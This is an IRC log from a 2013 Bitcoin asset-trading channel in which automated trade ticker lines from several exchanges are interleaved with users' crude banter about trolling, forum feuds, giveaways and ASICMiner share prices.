[AM100] 12 @ 0.044063 = 0.5288 BTC [+] Jul 19 13:09:29 [HAVELOCK] [AM100] 30 @ 0.04363 = 1.3089 BTC [-] Jul 19 13:09:31 [HAVELOCK] [AM100] 58 @ 0.0436 = 2.5288 BTC [-] Jul 19 13:09:37 TradeFortress Jul 19 13:09:38 [BTCTC] [BASIC-MINING] 1 @ 0.7375 BTC [+] Jul 19 13:09:43 you know I'm CrazyRabbi right? Jul 19 13:09:43 hi Supa Jul 19 13:09:49 >.< Jul 19 13:09:53 lol... Jul 19 13:09:58 you didn't know that? Jul 19 13:10:03 lol no Jul 19 13:10:09 theymos hates me with a passion Jul 19 13:10:14 I wonder why? Jul 19 13:10:20 ^^ Jul 19 13:10:21 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 13:10:23 epicly trolled him Jul 19 13:10:25 for years Jul 19 13:10:29 his hate for you is probably like my hate for whiskers75 Jul 19 13:10:29 [HAVELOCK] [AM1] 2 @ 4.62 = 9.24 BTC [+] Jul 19 13:10:30 going on 3+ years of trolling Jul 19 13:10:35 yep Jul 19 13:10:39 TF what exactly did Whiskers do? Jul 19 13:10:39 exactly like that Jul 19 13:10:40 lmao vendettas Jul 19 13:10:50 his hate for me is like the hate for Atlas dude Jul 19 13:10:53 Lol, I could go on for days about vendettas -_- Jul 19 13:10:54 likes vendettas Jul 19 13:10:59 that's bad hate Jul 19 13:11:05 all hate is bad hate Jul 19 13:11:08 [HAVELOCK] [AM1] 1 @ 4.62 BTC [+] Jul 19 13:11:11 lol Jul 19 13:11:19 [HAVELOCK] [AM1] 1 @ 4.62 BTC [+] Jul 19 13:11:21 speaking of which.. who was atlas's alts? Jul 19 13:11:37 no idea Jul 19 13:11:39 [BTCTC] [BASIC-MINING] 1 @ 0.753997 BTC [+] Jul 19 13:11:48 I got into bitcoins long after Atlas Jul 19 13:11:55 that's such a shame. Jul 19 13:11:59 ya Jul 19 13:12:02 missed all of it Jul 19 13:12:04 :( Jul 19 13:12:08 it turned out that some of his comments actually had merit, like his warnings about ultraprune needs to be developed carefully Jul 19 13:12:10 and the blockchain fork. Jul 19 13:12:19 ohh Jul 19 13:12:21 TradeFortress: I kept getting accused of being one of atlas's alts Jul 19 13:12:25 I was around for the ultraprune shit Jul 19 13:12:31 I'm talking like 2009 Jul 19 13:12:34 I wasn't arround then Jul 19 13:12:37 TradeFortress: question. How long have you know the cloud? Jul 19 13:12:40 [BTCTC] [AMC-PT] 625 @ 0.0025 = 1.5625 BTC [+] Jul 19 13:12:42 I got into bitcoins early 2011 Jul 19 13:12:42 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 13:12:44 Just out of curiosity. Jul 19 13:12:51 laughs at teh cloud Jul 19 13:12:59 Wildcat_, define "the cloud"? Jul 19 13:13:04 Supa: late 2012 It is too late to blame shit one me... Jul 19 13:13:16 lol Jul 19 13:13:24 Supa, I am pretty sure I had a forum account registered back in 2010 Jul 19 13:13:40 TradeFortress: The random one that likes to rain lol. Jul 19 13:14:20 :P Jul 19 13:14:44 lol it's funny cause BTC-e still blames me for every DDoS on their site Jul 19 13:14:49 She provides endless entertainment. Jul 19 13:14:51 I enjoy it. Jul 19 13:15:00 Supa, lol really Jul 19 13:15:05 ya dude Jul 19 13:15:16 "Who's responsible for the DDoS" Jul 19 13:15:19 do you do trolling jobs? Jul 19 13:15:19 btce: Supa Jul 19 13:15:21 lol Jul 19 13:15:30 well I am MrWubbles Jul 19 13:15:31 :D Jul 19 13:15:43 so I guess that was a pretty epic troll Jul 19 13:15:45 Seriously when I was at CoinVisitor I never saw anyone match clouds ban happiness Jul 19 13:15:59 [HAVELOCK] [AM100] 13 @ 0.044065 = 0.5728 BTC [+] Jul 19 13:15:59 BTC-e needs to do what I did for my brother's wedding. take the mag citrate, lose all of the weigh, then fuck all of the bridesmaids. Jul 19 13:16:14 >magnesium citrate Jul 19 13:16:16 >weight loss Jul 19 13:16:27 I don't think so, Tim. Jul 19 13:16:31 pirate: It's pretty tasty huh Jul 19 13:16:41 I love me some mutehammer Jul 19 13:16:44 Wildcat yummy Jul 19 13:16:50 Diablo-D3: Toes weight loss through colonic terror. Jul 19 13:16:56 Eat dem mutesammichs for days son. Jul 19 13:17:06 BingoBoingo: all you did was shit yourself to death and all the weight lost was water weight Jul 19 13:17:18 which is both dangerous and unneeded. Jul 19 13:17:21 Wildcat it would have been epic if all those clouds had actually gathered :P Jul 19 13:17:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.044602 = 0.0892 BTC [-] Jul 19 13:17:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.044601 = 0.1784 BTC [-] Jul 19 13:17:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0446 BTC [-] Jul 19 13:17:28 [BTCTC] [TAT.ASICMINER] 25 @ 0.044525 = 1.1131 BTC [-] Jul 19 13:17:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.0445 = 1.1125 BTC [-] Jul 19 13:17:32 [BTCTC] [TAT.ASICMINER] 8 @ 0.04432 = 0.3546 BTC [-] Jul 19 13:17:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.044302 = 0.443 BTC [-] Jul 19 13:17:44 and then you realize that was less than 1 share. Jul 19 13:17:50 lol. Jul 19 13:18:04 BingoBoingo: Ive gone from 340 to 252 in less than a year. Jul 19 13:18:10 pirate: We tried man, we tried. Jul 19 13:18:11 Diablo-D3: Do what. I got the bride's ginger friend for what, 15 minutes??? isn't that what counts. Jul 19 13:18:13 done using diet alone. Jul 19 13:18:19 pirate: Talk about a storm >:) Jul 19 13:18:23 hmm, I wonder if it is possible to do an application ddos on gribble simply by making lots of trades. Jul 19 13:18:27 >:3 Jul 19 13:18:29 ;; Jul 19 13:18:33 TradeFortress: no, its been tried Jul 19 13:18:44 built in limiter Jul 19 13:18:51 heh Jul 19 13:18:56 hmmm Jul 19 13:19:07 ddosing the trust system does seem fun TradeFortress Jul 19 13:19:09 [BTCTC] [AMC-PT] 1310 @ 0.0025 = 3.275 BTC [+] Jul 19 13:19:12 [HAVELOCK] [HIM] 2 @ 0.26709999 = 0.5342 BTC [-] Jul 19 13:19:21 but I'll pass Jul 19 13:19:24 Supa, what, I'm not paying you to leave negative trust ratings. i'm paying for professional grade trolling :P Jul 19 13:19:25 not bored enough yet Jul 19 13:19:31 lol Jul 19 13:19:41 I didn't want to be paid for it Jul 19 13:19:44 TradeFortress: You don't let me troll, but you pay others to troll. Jul 19 13:19:46 Come on man D: Jul 19 13:19:54 why would you pay me Jul 19 13:19:56 Wildcat_, depends on what site you are trolling >.< Jul 19 13:20:00 that's not a troll Jul 19 13:20:04 you can't pay for a troll Jul 19 13:20:05 good point Jul 19 13:20:09 trolls just happen Jul 19 13:20:09 get a grip... Jul 19 13:20:14 exactly Jul 19 13:20:14 its a work of art Jul 19 13:20:17 I don't go THAT hard on your site, I could be worse. Trust me. Jul 19 13:20:19 Is Goat live or dead? he is still the king of shills. Jul 19 13:20:33 Diablo-D3, was your BFL event a troll? Jul 19 13:20:38 TradeFortress: no Jul 19 13:20:40 Fuck BFL Jul 19 13:20:42 lol Jul 19 13:20:44 that was just me cleaning up the forum spam Jul 19 13:20:47 They are scuzzes Jul 19 13:20:53 and then getting mod powers removed for the hard work I put in Jul 19 13:20:56 nah, i love bfl. has made me tons of profit by sucking in people to buy their asic rigs Jul 19 13:20:57 [HAVELOCK] [AM100] 7 @ 0.04406499 = 0.3085 BTC [-] Jul 19 13:20:58 seriously, that took me like 2 days Jul 19 13:21:00 benefiting my investments Jul 19 13:21:01 [MPEX] [S.MPOE] 17000 @ 0.00089 = 15.13 BTC [+] Jul 19 13:21:07 and theymos was like Jul 19 13:21:17 NO, STOP, THEY WILL STOP PAYING ME SHILL MONEY Jul 19 13:21:29 so fuck him and the horse he rode in on Jul 19 13:21:32 All good admins have a few troll pirates in their employ, or should anyway Jul 19 13:21:54 [BTCTC] [BITVPS] 34 @ 0.00182 = 0.0619 BTC [+] Jul 19 13:21:58 Chaang-Noi, you need to write a book about matthew Jul 19 13:22:07 I was reading your old Goat vs Matthew thread regarding bitcoin magazine Jul 19 13:22:13 man Jul 19 13:22:16 much laughs were had. Jul 19 13:22:41 pirate: Weed out the idiots, eh? Jul 19 13:22:47 [HAVELOCK] [SMG] 500 @ 0.000355 = 0.1775 BTC [-] Jul 19 13:22:49 [HAVELOCK] [SMG] 305 @ 0.00035 = 0.1068 BTC [-] Jul 19 13:22:51 [HAVELOCK] [SMG] 1125 @ 0.00034 = 0.3825 BTC [-] Jul 19 13:22:53 [HAVELOCK] [SMG] 445 @ 0.00033 = 0.1469 BTC [-] Jul 19 13:22:54 I offer my services free of charge, and still get hated on. Jul 19 13:22:55 [HAVELOCK] [SMG] 125 @ 0.00030001 = 0.0375 BTC [-] Jul 19 13:23:09 Chaang-Noi, I like reading forum drama. Jul 19 13:23:19 GOAT! Jul 19 13:23:22 Is goat live or dead, fills his investors full of dread Jul 19 13:23:27 <3 Jul 19 13:23:39 [HAVELOCK] [SMG] 100 @ 0.0003 = 0.03 BTC [-] Jul 19 13:23:41 <<<--CrazyRabbi Jul 19 13:23:41 [HAVELOCK] [SMG] 100 @ 0.0003 = 0.03 BTC [-] Jul 19 13:23:43 :D Jul 19 13:23:52 [HAVELOCK] [AM1] 6 @ 4.62 = 27.72 BTC [+] Jul 19 13:24:04 my thread got put in the Free Bitcoins thread Jul 19 13:24:06 Supa, banned yet? Jul 19 13:24:11 I got a nerd boner Jul 19 13:24:19 HAHA Chaang-Noi Jul 19 13:24:29 oh wait freenode has no tipping ;( Jul 19 13:24:33 come to coinchat guys :P Jul 19 13:24:33 [BTCTC] [COGNITIVE] 1 @ 0.769999 BTC [+] Jul 19 13:24:33 hey Goat Jul 19 13:24:42 you are rich Jul 19 13:24:54 mind donating to my giveaway Jul 19 13:24:59 [HAVELOCK] [SMG] 800 @ 0.000375 = 0.3 BTC [+] Jul 19 13:25:02 [MPEX] [S.MPOE] 10000 @ 0.00088591 = 8.8591 BTC [-] Jul 19 13:25:09 [HAVELOCK] [AM1] 3 @ 4.69 = 14.07 BTC [+] Jul 19 13:25:09 will save me a bit on my giveaway Jul 19 13:25:13 less mining Jul 19 13:25:18 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 19 13:25:21 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 13:25:40 [HAVELOCK] [AM1] 1 @ 4.69 BTC [+] Jul 19 13:26:19 [HAVELOCK] [VTX] 1 @ 0.6331 BTC [-] Jul 19 13:26:24 [HAVELOCK] [VTX] 4 @ 0.6331 = 2.5324 BTC [-] Jul 19 13:26:27 [HAVELOCK] [AM100] 7 @ 0.044065 = 0.3085 BTC [+] Jul 19 13:26:33 [HAVELOCK] [VTX] 4 @ 0.633 = 2.532 BTC [-] Jul 19 13:26:40 [HAVELOCK] [VTX] 3 @ 0.633 = 1.899 BTC [-] Jul 19 13:26:47 [HAVELOCK] [VTX] 2 @ 0.633 = 1.266 BTC [-] Jul 19 13:26:56 [HAVELOCK] [VTX] 1 @ 0.633 BTC [-] Jul 19 13:27:05 [HAVELOCK] [AM100] 80 @ 0.045499 = 3.6399 BTC [+] Jul 19 13:27:08 [HAVELOCK] [VTX] 6 @ 0.63021 = 3.7813 BTC [-] Jul 19 13:27:13 [HAVELOCK] [VTX] 1 @ 0.6211 BTC [-] Jul 19 13:27:19 [HAVELOCK] [VTX] 5 @ 0.621 = 3.105 BTC [-] Jul 19 13:27:28 [HAVELOCK] [VTX] 1 @ 0.6001 BTC [-] Jul 19 13:27:30 [HAVELOCK] [AM100] 3 @ 0.045499 = 0.1365 BTC [+] Jul 19 13:27:35 [HAVELOCK] [VTX] 1 @ 0.6 BTC [-] Jul 19 13:27:41 [HAVELOCK] [VTX] 1 @ 0.6 BTC [-] Jul 19 13:27:50 [HAVELOCK] [VTX] 10 @ 0.56 = 5.6 BTC [-] Jul 19 13:28:02 [HAVELOCK] [VTX] 1 @ 0.53 BTC [-] Jul 19 13:28:06 [HAVELOCK] [VTX] 1 @ 0.53 BTC [-] Jul 19 13:28:11 [HAVELOCK] [VTX] 2 @ 0.52001 = 1.04 BTC [-] Jul 19 13:28:20 Chaang-Noi, "Matthew why did you not confirm my address? I paid in full! Jul 19 13:28:20 " Jul 19 13:28:21 lol Jul 19 13:28:45 [HAVELOCK] [AM100] 60 @ 0.045498 = 2.7299 BTC [-] Jul 19 13:29:07 Goat Jul 19 13:29:13 wanna d onate to my giveaway dude? Jul 19 13:29:19 ole buddy ole pal Jul 19 13:29:22 [HAVELOCK] [VTX] 1 @ 0.52002 BTC [+] Jul 19 13:29:27 [HAVELOCK] [AM1] 1 @ 4.75 BTC [+] Jul 19 13:29:27 chea Jul 19 13:29:28 [HAVELOCK] [VTX] 5 @ 0.52 = 2.6 BTC [-] Jul 19 13:29:30 I posted in it Jul 19 13:29:33 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Jul 19 13:29:57 [HAVELOCK] [VTX] 1 @ 0.504 BTC [-] Jul 19 13:30:02 I is mining Jul 19 13:30:05 [HAVELOCK] [VTX] 13 @ 0.5032 = 6.5416 BTC [-] Jul 19 13:30:08 hang on I shows you my thread :D Jul 19 13:30:14 Chaang-Noi, nah Jul 19 13:30:15 [HAVELOCK] [VTX] 2 @ 0.503 = 1.006 BTC [-] Jul 19 13:30:20 [HAVELOCK] [VTX] 1 @ 0.500002 BTC [-] Jul 19 13:30:23 [HAVELOCK] [VTX] 1 @ 0.5 BTC [-] Jul 19 13:30:30 [HAVELOCK] [VTX] 20 @ 0.5 = 10 BTC [-] Jul 19 13:30:31 https://bitcointalk.org/index.php?topic=255437.0;topicseen Jul 19 13:30:34 see Goat Jul 19 13:30:36 Offering Free Bitcoin Mining (1 BTM Each) (Post your address to receive) Jul 19 13:30:40 I is being good :D Jul 19 13:30:49 [HAVELOCK] [VTX] 1 @ 0.5 BTC [-] Jul 19 13:30:50 Well goodnight. I'm off. Jul 19 13:30:55 [HAVELOCK] [VTX] 10 @ 0.4951 = 4.951 BTC [-] Jul 19 13:31:00 [HAVELOCK] [VTX] 8 @ 0.495 = 3.96 BTC [-] Jul 19 13:31:05 [HAVELOCK] [VTX] 1 @ 0.491 BTC [-] Jul 19 13:31:07 I'm working for it dude Jul 19 13:31:11 [HAVELOCK] [VTX] 2 @ 0.486 = 0.972 BTC [-] Jul 19 13:31:15 I'm securing da bitcoin network Jul 19 13:31:16 :o Jul 19 13:31:20 [BTCTC] [COGNITIVE] 1 @ 0.775 BTC [+] Jul 19 13:31:58 [BTCTC] [COGNITIVE] 32 @ 0.78 = 24.96 BTC [+] Jul 19 13:32:00 [HAVELOCK] [VTX] 1 @ 0.481 BTC [-] Jul 19 13:32:05 [HAVELOCK] [VTX] 1 @ 0.471 BTC [-] Jul 19 13:32:11 [HAVELOCK] [VTX] 1 @ 0.461 BTC [-] Jul 19 13:32:14 [HAVELOCK] [VTX] 1 @ 0.46 BTC [-] Jul 19 13:32:26 [HAVELOCK] [VTX] 1 @ 0.4385 BTC [-] Jul 19 13:32:35 hey Goat I'll suck your dick Jul 19 13:32:35 [HAVELOCK] [VTX] 4 @ 0.42303101 = 1.6921 BTC [-] Jul 19 13:32:38 "trollface.gif" Jul 19 13:32:41 XD Jul 19 13:32:50 LOL Jul 19 13:33:00 [HAVELOCK] [VTX] 10 @ 0.43 = 4.3 BTC [+] Jul 19 13:33:07 took me 5 seconds to find vuln in havelockinvestments.com :P Jul 19 13:33:15 lol Jul 19 13:34:19 http://imgur.com/xjHvbrU.png Jul 19 13:34:33 Now I can say I've found vulnerabilities in all major bitcoin asset exchanges :) - time to report it Jul 19 13:35:54 [HAVELOCK] [VTX] 10 @ 0.422 = 4.22 BTC [-] Jul 19 13:36:08 [HAVELOCK] [VTX] 5 @ 0.4152 = 2.076 BTC [-] Jul 19 13:36:11 [HAVELOCK] [VTX] 5 @ 0.43 = 2.15 BTC [+] Jul 19 13:36:14 [HAVELOCK] [VTX] 4 @ 0.41 = 1.64 BTC [-] Jul 19 13:36:19 [HAVELOCK] [VTX] 1 @ 0.4 BTC [-] Jul 19 13:36:24 [HAVELOCK] [VTX] 11 @ 0.39 = 4.29 BTC [-] Jul 19 13:38:58 [BTCTC] [COGNITIVE] 1 @ 0.789984 BTC [+] Jul 19 13:39:19 [BTCTC] [BASIC-MINING] 1 @ 0.753995 BTC [-] Jul 19 13:42:06 my Boss just sent me 48 ASiCMiNER Shares Jul 19 13:42:09 what's that worth? Jul 19 13:43:31 [BTCTC] [COGNITIVE] 9 @ 0.789985 = 7.1099 BTC [+] Jul 19 13:43:33 [BTCTC] [COGNITIVE] 1 @ 0.79 BTC [+] Jul 19 13:43:40 Supa: ~$20,000 currently Jul 19 13:43:46 [BTCTC] [ASICMINER-PT] 3 @ 4.695 = 14.085 BTC [+] Jul 19 13:43:55 holy shit seriously? Jul 19 13:43:56 xD Jul 19 13:43:58 :O Jul 19 13:44:09 "faints" Jul 19 13:44:26 ok I'm ok Jul 19 13:44:30 but er muh gud Jul 19 13:45:12 [BTCTC] [ASICMINER-PT] 5 @ 4.7 = 23.5 BTC [+] Jul 19 13:45:20 lol Jul 19 13:45:22 that was me Jul 19 13:45:27 ^_^ Jul 19 13:45:47 hehe Jul 19 13:46:35 but picked up a lot of them at 0.4 :P Jul 19 13:47:11 you don't sell / sell the right things Jul 19 13:47:13 sell asicminer, not sell pirate. Jul 19 13:47:19 [HAVELOCK] [VTX] 14 @ 0.395 = 5.53 BTC [+] Jul 19 13:47:31 usagi, Yeah. Jul 19 13:47:37 [HAVELOCK] [AM1] 1 @ 4.75 BTC [+] Jul 19 13:47:41 ohh fuck me Jul 19 13:47:44 did someone say pirate???? Jul 19 13:47:45 it was 8 shares Jul 19 13:47:48 not 48 Jul 19 13:47:56 fail at reading Jul 19 13:47:57 :( Jul 19 13:48:01 mwahahahahaha Jul 19 13:48:12 wow Jul 19 13:48:17 that was a terrible misread Jul 19 13:48:26 what's 8 shares worth :( Jul 19 13:48:30 and I just sold 5 :'( Jul 19 13:48:54 ohh 4.7 each? Jul 19 13:48:57 [BTCTC] [AMC-PT] 5612 @ 0.0025 = 14.03 BTC [+] Jul 19 13:49:00 so 4.7 x 8 Jul 19 13:49:01 ? Jul 19 13:49:06 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [-] Jul 19 13:49:31 37.6 Jul 19 13:49:33 [BTCTC] [AMC-PT] 9350 @ 0.0025 = 23.375 BTC [+] Jul 19 13:49:33 damn it Jul 19 13:49:43 now I'm depressed :( Jul 19 13:49:57 sucks 2 b you Jul 19 13:50:09 [BTCTC] [AMC-PT] 13 @ 0.0025 = 0.0325 BTC [+] Jul 19 13:50:11 ya Jul 19 13:50:15 sold 5 too Jul 19 13:50:25 uggh Jul 19 13:50:32 [HAVELOCK] [SDSTM] 7 @ 0.010999 = 0.077 BTC [-] Jul 19 13:50:54 /b/ - Random Jul 19 13:52:01 37.16 minutes Jul 19 13:52:46 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003812 = 0.0381 BTC [-] Jul 19 13:52:56 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003811 = 0.3811 BTC [-] Jul 19 13:52:59 [BTCTC] [TAT.VIRTUALMINE] 943 @ 0.00381 = 3.5928 BTC [-] Jul 19 13:52:59 [BTCTC] [TAT.VIRTUALMINE] 86 @ 0.003715 = 0.3195 BTC [-] Jul 19 13:53:01 [BTCTC] [TAT.VIRTUALMINE] 570 @ 0.003708 = 2.1136 BTC [-] Jul 19 13:53:04 lol GlooBoy is a fuckin loser dude Jul 19 13:53:11 he tried to phish my information Jul 19 13:53:17 so I just gave him my personal info Jul 19 13:53:18 address Jul 19 13:53:19 name Jul 19 13:53:21 dob Jul 19 13:53:23 was like come at me Jul 19 13:53:25 [HAVELOCK] [AM100] 16 @ 0.045498 = 0.728 BTC [-] Jul 19 13:53:26 he still got it wrong Jul 19 13:53:28 I lol'd Jul 19 13:57:33 [BTCTC] [BASIC-MINING] 1 @ 0.7174 BTC [-] Jul 19 13:57:35 [BTCTC] [BASIC-MINING] 1 @ 0.710001 BTC [-] Jul 19 13:57:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0439 BTC [-] Jul 19 13:58:13 [BTCTC] [TAT.ASICMINER] 12 @ 0.0437 = 0.5244 BTC [-] Jul 19 13:58:32 [BTCTC] [AMC-PT] 590 @ 0.0025 = 1.475 BTC [+] Jul 19 13:58:34 you guys don't have to join that channel just testing if my invite script works Jul 19 13:58:37 and it does Jul 19 13:59:17 *stores it for future reference* Jul 19 13:59:25 [BTCTC] [AMC-PT] 808 @ 0.0025 = 2.02 BTC [+] Jul 19 13:59:27 :D Jul 19 13:59:37 join if you like pirate you are more then welcome Jul 19 13:59:52 it's xisalty and I's channel Jul 19 14:00:15 ty I am already in like 5 chats rite now lelelel Jul 19 14:00:22 soon, mah pretty....soon Jul 19 14:00:47 :D Jul 19 14:02:43 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 19 14:04:13 [BTCTC] [BFMINES] 22 @ 0.003999 = 0.088 BTC [+] Jul 19 14:04:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.043601 = 0.436 BTC [-] Jul 19 14:04:36 [BTCTC] [AMC-PT] 6000 @ 0.0025 = 15 BTC [+] Jul 19 14:05:00 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jul 19 14:06:05 [MPEX] [S.MPOE] 10951 @ 0.00088552 = 9.6973 BTC [-] Jul 19 14:06:25 [MPEX] [S.MPOE] 3144 @ 0.00088449 = 2.7808 BTC [-] Jul 19 14:06:55 [MPEX] [S.MPOE] 6005 @ 0.00088312 = 5.3031 BTC [-] Jul 19 14:11:33 http://www.nytimes.com/2013/07/19/opinion/krugman-hitting-chinas-wall.html?_r=1& Jul 19 14:12:44 TradeFortress- do u use a "kit"? like metasploit? Jul 19 14:13:37 [HAVELOCK] [SMG] 125 @ 0.0003499 = 0.0437 BTC [-] Jul 19 14:14:27 if i understand that article correctly, we need to get more peasants into china Jul 19 14:15:11 [BTCTC] [AMC-PT] 333 @ 0.0025 = 0.8325 BTC [+] Jul 19 14:15:17 [HAVELOCK] [SMG] 875 @ 0.00035 = 0.3063 BTC [+] Jul 19 14:15:42 [HAVELOCK] [AM1] 4 @ 4.62 = 18.48 BTC [-] Jul 19 14:16:06 [HAVELOCK] [AM100] 3 @ 0.045397 = 0.1362 BTC [-] Jul 19 14:16:50 those two new s.mg passthrus gave the price a bit of a bump, hey? Jul 19 14:16:52 [HAVELOCK] [SDSTM] 4 @ 0.0112 = 0.0448 BTC [+] Jul 19 14:17:29 [BTCTC] [ASICMINER-PT] 3 @ 4.72 = 14.16 BTC [+] Jul 19 14:19:52 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [+] Jul 19 14:20:00 [BTCTC] [ASICMINER-PT] 2 @ 4.72999 = 9.46 BTC [+] Jul 19 14:20:38 [BTCTC] [BASIC-MINING] 1 @ 0.715 BTC [+] Jul 19 14:21:04 [BTCTC] [ASICMINER-PT] 1 @ 4.73995 BTC [+] Jul 19 14:21:06 [BTCTC] [ASICMINER-PT] 1 @ 4.73996 BTC [+] Jul 19 14:22:40 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 14:23:05 [BTCTC] [TAT.ASICMINER] 42 @ 0.044897 = 1.8857 BTC [+] Jul 19 14:23:15 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 14:23:31 [BTCTC] [AMC-PT] 1432 @ 0.0025 = 3.58 BTC [+] Jul 19 14:23:47 [HAVELOCK] [AM100] 5 @ 0.045397 = 0.227 BTC [-] Jul 19 14:25:22 [HAVELOCK] [AM100] 2 @ 0.045298 = 0.0906 BTC [-] Jul 19 14:26:06 [BTCTC] [AMC-PT] 530 @ 0.0025 = 1.325 BTC [+] Jul 19 14:26:31 [BTCTC] [COGNITIVE] 1 @ 0.71 BTC [-] Jul 19 14:26:33 [BTCTC] [COGNITIVE] 3 @ 0.705005 = 2.115 BTC [-] Jul 19 14:27:04 [BTCTC] [BASIC-MINING] 3 @ 0.715 = 2.145 BTC [+] Jul 19 14:29:12 [HAVELOCK] [SDSTM] 10 @ 0.0112 = 0.112 BTC [+] Jul 19 14:29:21 [BTCTC] [AMC-PT] 899 @ 0.0025 = 2.2475 BTC [+] Jul 19 14:29:24 [HAVELOCK] [SDSTM] 99 @ 0.0105 = 1.0395 BTC [-] Jul 19 14:29:26 [HAVELOCK] [SDSTM] 500 @ 0.01 = 5 BTC [-] Jul 19 14:29:29 [HAVELOCK] [SDSTM] 20 @ 0.00975 = 0.195 BTC [-] Jul 19 14:29:31 [HAVELOCK] [SDSTM] 55 @ 0.00965 = 0.5308 BTC [-] Jul 19 14:29:33 [HAVELOCK] [SDSTM] 320 @ 0.0096 = 3.072 BTC [-] Jul 19 14:29:35 [HAVELOCK] [SDSTM] 6 @ 0.00955 = 0.0573 BTC [-] Jul 19 14:29:57 [HAVELOCK] [SDSTM] 16 @ 0.0112 = 0.1792 BTC [+] Jul 19 14:29:59 [HAVELOCK] [SDSTM] 10 @ 0.0115 = 0.115 BTC [+] Jul 19 14:30:01 [HAVELOCK] [SDSTM] 472 @ 0.0117 = 5.5224 BTC [+] Jul 19 14:30:03 [HAVELOCK] [SDSTM] 193 @ 0.012 = 2.316 BTC [+] Jul 19 14:30:05 [HAVELOCK] [SDSTM] 133 @ 0.012 = 1.596 BTC [+] Jul 19 14:30:16 [HAVELOCK] [SDSTM] 394 @ 0.00955 = 3.7627 BTC [-] Jul 19 14:30:18 [HAVELOCK] [SDSTM] 606 @ 0.0095 = 5.757 BTC [-] Jul 19 14:30:31 [BTCTC] [ASICMINER-PT] 1 @ 4.739983 BTC [+] Jul 19 14:30:33 [BTCTC] [ASICMINER-PT] 11 @ 4.741 = 52.151 BTC [+] Jul 19 14:30:37 [BTCTC] [ASICMINER-PT] 1 @ 4.749995 BTC [+] Jul 19 14:30:37 [BTCTC] [ASICMINER-PT] 1 @ 4.749998 BTC [+] Jul 19 14:30:39 [BTCTC] [ASICMINER-PT] 2 @ 4.75 = 9.5 BTC [+] Jul 19 14:32:13 [HAVELOCK] [SMG] 125 @ 0.00035 = 0.0438 BTC [+] Jul 19 14:32:15 [HAVELOCK] [SMG] 200 @ 0.000375 = 0.075 BTC [+] Jul 19 14:32:17 [HAVELOCK] [SMG] 4200 @ 0.0004 = 1.68 BTC [+] Jul 19 14:32:20 [HAVELOCK] [SMG] 996 @ 0.0004249 = 0.4232 BTC [+] Jul 19 14:32:22 [HAVELOCK] [SMG] 4869 @ 0.000425 = 2.0693 BTC [+] Jul 19 14:32:25 [HAVELOCK] [HIM] 1 @ 0.26709999 BTC [-] Jul 19 14:32:28 [BTCTC] [AMC-PT] 33950 @ 0.0025 = 84.875 BTC [+] Jul 19 14:32:37 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 14:33:08 [HAVELOCK] [SMG] 2510 @ 0.00043 = 1.0793 BTC [+] Jul 19 14:33:27 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 19 14:33:35 [HAVELOCK] [HIM] 2 @ 0.26709999 = 0.5342 BTC [-] Jul 19 14:35:21 [HAVELOCK] [AM100] 7 @ 0.044 = 0.308 BTC [-] Jul 19 14:35:46 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 14:37:15 [HAVELOCK] [SDSTM] 1 @ 0.0119 BTC [+] Jul 19 14:37:46 [BTCTC] [AMC-PT] 270 @ 0.0025 = 0.675 BTC [+] Jul 19 14:38:07 [HAVELOCK] [AM100] 20 @ 0.04360001 = 0.872 BTC [-] Jul 19 14:38:51 [HAVELOCK] [AM100] 4 @ 0.04360001 = 0.1744 BTC [-] Jul 19 14:39:00 [HAVELOCK] [AM100] 3 @ 0.0436 = 0.1308 BTC [-] Jul 19 14:39:15 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [+] Jul 19 14:39:22 [HAVELOCK] [AM1] 1 @ 4.64 BTC [+] Jul 19 14:39:56 [HAVELOCK] [SMG] 100 @ 0.00044998 = 0.045 BTC [+] Jul 19 14:41:39 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 14:42:32 [BTCTC] [TAT.ASICMINER] 4 @ 0.044795 = 0.1792 BTC [-] Jul 19 14:42:59 [BTCTC] [AMC-PT] 2400 @ 0.0025 = 6 BTC [+] Jul 19 14:44:26 [MPEX] [S.MPOE] 9445 @ 0.00088312 = 8.3411 BTC [-] Jul 19 14:44:35 [MPEX] [S.MPOE] 12250 @ 0.00088206 = 10.8052 BTC [-] Jul 19 14:44:39 [MPEX] [S.MPOE] 11050 @ 0.00088098 = 9.7348 BTC [-] Jul 19 14:45:02 [MPEX] [S.MPOE] 3036 @ 0.00087903 = 2.6687 BTC [-] Jul 19 14:45:22 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 14:46:05 [HAVELOCK] [SMG] 200 @ 0.00042 = 0.084 BTC [-] Jul 19 14:47:14 [BTCTC] [ASICMINER-PT] 8 @ 4.7 = 37.6 BTC [-] Jul 19 14:50:32 [BTCTC] [AMC-PT] 15300 @ 0.0025 = 38.25 BTC [+] Jul 19 14:52:51 [BTCTC] [AMC-PT] 7920 @ 0.0025 = 19.8 BTC [+] Jul 19 14:56:09 [HAVELOCK] [SDSTM] 22 @ 0.00952 = 0.2094 BTC [-] Jul 19 14:56:12 [HAVELOCK] 